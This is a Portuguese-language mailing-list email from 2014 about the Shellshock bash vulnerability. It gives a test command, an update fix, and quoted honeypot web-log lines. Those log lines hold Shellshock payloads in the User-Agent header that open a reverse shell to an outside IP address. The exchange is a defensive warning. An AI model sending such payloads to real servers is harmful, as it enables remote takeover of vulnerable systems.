<div dir="ltr">Boa Noite Flavio<div><br></div><div>Segue uma dica pra verificar se o servidor está vulnerável:</div><div>env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"<br></div><div><br></div><div>*Dica divulgada pela DigitalOcean.</div><div><br></div><div>Pra resolver é só realizar update do bash: yum update bash</div><div><br></div><div><br></div><div><br></div></div><div class="gmail_extra"><br clear="all"><div><div dir="ltr"><br><div><table style="font-family:'Times New Roman'"><tbody><tr><td rowspan="3"><a href="mailto:rafaelsnsa@gmail.com" title="Enviar um e-mail para mim" target="_blank"><img alt="Sua Foto" src="https://lh5.googleusercontent.com/-4_Ww7w9G_BM/AAAAAAAAAAI/AAAAAAAAD40/IgVDbZCLz5w/s120-c/photo.jpg" width="70" height="70" style="clear:left;float:left;margin-bottom:5px;margin-right:5px"></a></td><td><span style="font-family:'Trebuchet MS',Trebuchet,sans-serif;font-size:22px;font-weight:bold">Rafael S. Saraiva</span></td></tr><tr><td><span style="font-family:'Trebuchet MS',Trebuchet,sans-serif">Porto Alegre - RS | Mobile: <a><img src="http://www.sidneyrezende.com/srzd/7ano/imagens/bandeira-brasil.png" title="Brazil +55" border="0"></a> (51) 8174-7956</span></td></tr><tr><td><a href="http://br.linkedin.com/pub/rafael-saraiva/52/aab/230" target="_blank"><img src="https://static.licdn.com/scds/common/u/img/webpromo/btn_viewmy_160x25.png" border="0" width="160" height="25" title="View Rafael Saraiva's profile on LinkedIn"></a> <a href="https://plus.google.com/u/0/+RafaelSaraivaRS" target="_blank"><img src="https://ssl.gstatic.com/s2/oz/images/faviconr2.ico" border="0" width="25" height="25" title="View Rafael Saraiva's profile on Google+"></a></td></tr></tbody></table></div></div></div>
<br><div class="gmail_quote">Em 26 de setembro de 2014 15:11, Flavio Goncalves <span dir="ltr"><<a href="mailto:flavio@voffice.com.br" target="_blank">flavio@voffice.com.br</a>></span> escreveu:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr"><div>Caros amigos,</div><div><br></div><div>A vulnerabilidade do bash conhecida como shellshock foi descoberta recentemente e divulgada ontem. Ela permite a execução de comandos remotos nos servidores através dos servidores http. Os nossos honeypots já estão detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo em atualizar os servidores e evitem fraudes. </div><div><br></div><div>Exemplo do que estamos detectando neste exato momento:</div><div><div><br></div><div>[26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/<a href="http://195.225.34.14/3333" target="_blank">195.225.34.14/3333</a> 0>&1'"</div><div>[26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/<a href="http://195.225.34.14/3333" target="_blank">195.225.34.14/3333</a> 0>&1'"</div></div><div><br></div><div>Att, </div><div><br></div><div><div dir="ltr">Flavio E. Goncalves<br><div><br></div></div></div>
</div>
<br>_______________________________________________<br>
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES.<br>
Garanta a sua vaga e saiba mais em: <a href="http://www.workoffee.com.br" target="_blank">www.workoffee.com.br</a><br>
_______________________________________________<br>
ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia IP .<br>
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.<br>
Banco de Canais Analógicos – Appliance Asterisk Acesse <a href="http://www.aligera.com.br" target="_blank">www.aligera.com.br</a><br>
_______________________________________________<br>
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.<br>
Construa soluções de PABX IP com produtos DigiVoice - visite <a href="http://www.digivoice.com.br" target="_blank">www.digivoice.com.br</a><br>
_______________________________________________<br>
Para remover seu email desta lista, basta enviar um email em branco para <a href="mailto:asteriskbrasil-unsubscribe@listas.asteriskbrasil.org">asteriskbrasil-unsubscribe@listas.asteriskbrasil.org</a><br></blockquote></div><br></div>